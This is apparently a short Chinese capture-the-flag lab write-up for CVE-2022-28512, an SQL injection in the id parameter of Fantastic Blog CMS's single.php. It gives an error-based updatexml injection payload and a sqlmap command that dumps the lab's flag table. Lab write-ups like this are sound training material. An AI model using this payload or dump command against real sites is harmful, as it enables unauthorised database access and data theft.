春秋云境:CVE-2022-28512
文章合集:春秋云境系列靶场记录(合集)
关注WX:【小白SEC】查看更多内容……
Fantastic Blog (CMS) SQL注入:CVE-2022-28512
漏洞介绍
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
解题步骤
-
访问URL
-
根据题目提示,构造URL并访问,也可以在网页中找到注入点:http://eci-2szxi1jaw56zweb49woe.cloudeci1.ichunqiu.com/single.php?id=1
-
探测存在SQL注入:
1'+and+(updatexml(1,concat('~',version()),1))='
-
保存数据包到文件,使用Sqlmap直接跑,获取flag:
python sqlmap.py -r 1.txt -D ctf -T flag --dump -v
文章合集:春秋云境系列靶场记录(合集)